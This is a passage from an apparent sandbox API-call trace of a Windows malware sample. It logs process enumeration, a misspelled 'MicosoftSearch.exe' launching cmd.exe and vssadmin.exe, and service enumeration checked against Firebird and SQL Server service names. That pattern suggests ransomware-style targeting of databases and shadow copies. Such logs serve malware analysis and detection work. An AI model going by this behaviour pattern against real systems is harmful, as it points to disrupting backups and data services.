(lpString="jaguar_assist_dictionaries.exe") returned 30 [0047.368] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0047.369] lstrlenW (lpString="blue.exe") returned 8 [0047.369] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0047.370] lstrlenW (lpString="newly debut.exe") returned 15 [0047.370] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0047.503] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0047.503] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0047.503] lstrlenW (lpString="archive.exe") returned 11 [0047.504] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0047.504] lstrlenW (lpString="defend.exe") returned 10 [0047.504] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0047.505] lstrlenW (lpString="arservice.exe") returned 13 [0047.505] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0047.506] lstrlenW (lpString="rr-programmer.exe") returned 17 [0047.506] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0047.507] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0047.507] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0047.507] lstrlenW (lpString="twistedmonton.exe") returned 17 [0047.507] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0047.508] lstrlenW (lpString="arc plains.exe") returned 14 [0047.508] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0047.509] lstrlenW (lpString="americahousestip.exe") returned 20 [0047.509] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0047.510] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0047.510] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0047.511] lstrlenW (lpString="medical lectures.exe") returned 20 [0047.511] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0047.511] lstrlenW (lpString="electronic.exe") returned 14 [0047.511] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0047.512] lstrlenW (lpString="regression.exe") returned 14 [0047.512] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0047.513] lstrlenW (lpString="county.exe") returned 10 [0047.513] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0047.514] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0047.514] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0047.514] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0047.514] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0047.515] lstrlenW (lpString="cmd.exe") returned 7 [0047.515] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0047.516] lstrlenW (lpString="conhost.exe") returned 11 [0047.516] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0047.517] lstrlenW (lpString="vssadmin.exe") returned 12 [0047.517] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0047.518] lstrlenW (lpString="VSSVC.exe") returned 9 [0047.518] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.519] lstrlenW (lpString="svchost.exe") returned 11 [0047.519] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0047.520] CloseHandle (hObject=0x194) returned 1 [0047.520] Sleep (dwMilliseconds=0x1f4) [0048.301] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232bd0 [0048.302] EnumServicesStatusExW (in: hSCManager=0x4232bd0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0048.302] GetLastError () returned 0xea [0048.302] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xbc83f8 [0048.302] EnumServicesStatusExW (in: hSCManager=0x4232bd0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbc83f8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbc83f8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0048.303] CloseServiceHandle (hSCObject=0x4232bd0) returned 1 [0048.303] lstrlenW (lpString="Appinfo") returned 7 [0048.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0048.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0048.303] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0048.303] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0048.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0048.303] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0048.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0048.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0048.303] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0048.303] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0048.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0048.303] lstrlenW (lpString="AudioSrv") returned 8 [0048.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0048.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0048.303] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0048.303] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0048.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0048.303] lstrlenW (lpString="BFE") returned 3 [0048.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0048.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0048.304] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0048.304] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0048.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0048.304] lstrlenW (lpString="CryptSvc") returned 8 [0048.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0048.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0048.304] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0048.304] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0048.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0048.304] lstrlenW (lpString="CscService") returned 10 [0048.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0048.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0048.304] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0048.304] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0048.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0048.304] lstrlenW (lpString="DcomLaunch") returned 10 [0048.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0048.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0048.304] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0048.304] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0048.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0048.304] lstrlenW (lpString="Dhcp") returned 4 [0048.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0048.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0048.304] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0048.304] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0048.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0048.304] lstrlenW (lpString="Dnscache") returned 8 [0048.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0048.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0048.304] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0048.304] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0048.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0048.304] lstrlenW (lpString="DPS") returned 3 [0048.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0048.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0048.305] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0048.305] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0048.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0048.305] lstrlenW (lpString="eventlog") returned 8 [0048.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0048.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0048.305] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0048.305] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0048.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0048.305] lstrlenW (lpString="EventSystem") returned 11 [0048.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0048.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0048.305] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0048.305] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0048.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0048.305] lstrlenW (lpString="gpsvc") returned 5 [0048.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0048.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0048.305] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0048.305] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0048.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0048.305] lstrlenW (lpString="iphlpsvc") returned 8 [0048.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0048.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0048.305] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0048.305] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0048.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0048.305] lstrlenW (lpString="LanmanServer") returned 12 [0048.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0048.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0048.305] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0048.305] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0048.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0048.305] lstrlenW (lpString="LanmanWorkstation") returned 17 [0048.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0048.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0048.306] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0048.306] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0048.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0048.306] lstrlenW (lpString="lmhosts") returned 7 [0048.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0048.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0048.306] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0048.306] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0048.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0048.306] lstrlenW (lpString="MMCSS") returned 5 [0048.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0048.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0048.306] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0048.306] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0048.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0048.306] lstrlenW (lpString="MpsSvc") returned 6 [0048.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0048.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0048.306] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0048.306] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0048.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0048.306] lstrlenW (lpString="Netman") returned 6 [0048.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0048.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0048.306] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0048.306] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0048.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0048.306] lstrlenW (lpString="netprofm") returned 8 [0048.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0048.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0048.306] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0048.306] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0048.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0048.307] lstrlenW (lpString="NlaSvc") returned 6 [0048.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0048.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0048.307] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0048.307] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0048.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0048.307] lstrlenW (lpString="nsi") returned 3 [0048.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0048.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0048.307] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0048.307] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0048.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0048.307] lstrlenW (lpString="PcaSvc") returned 6 [0048.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0048.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0048.307] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0048.307] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0048.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0048.307] lstrlenW (lpString="PlugPlay") returned 8 [0048.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0048.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0048.307] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0048.307] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0048.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0048.307] lstrlenW (lpString="Power") returned 5 [0048.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0048.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0048.307] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0048.307] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0048.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0048.307] lstrlenW (lpString="ProfSvc") returned 7 [0048.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0048.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0048.307] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0048.308] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0048.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0048.308] lstrlenW (lpString="RpcEptMapper") returned 12 [0048.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0048.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0048.308] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0048.308] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0048.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0048.308] lstrlenW (lpString="RpcSs") returned 5 [0048.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0048.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0048.308] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0048.308] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0048.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0048.308] lstrlenW (lpString="SamSs") returned 5 [0048.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0048.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0048.308] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0048.308] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0048.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0048.308] lstrlenW (lpString="Schedule") returned 8 [0048.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0048.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0048.308] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0048.308] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0048.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0048.308] lstrlenW (lpString="SENS") returned 4 [0048.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0048.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0048.308] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0048.308] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0048.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0048.308] lstrlenW (lpString="ShellHWDetection") returned 16 [0048.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0048.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0048.308] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0048.309] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0048.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0048.309] lstrlenW (lpString="Spooler") returned 7 [0048.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0048.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0048.309] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0048.309] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0048.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0048.309] lstrlenW (lpString="swprv") returned 5 [0048.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0048.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0048.309] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0048.309] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0048.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0048.309] lstrlenW (lpString="SysMain") returned 7 [0048.309] lstrcmpiW 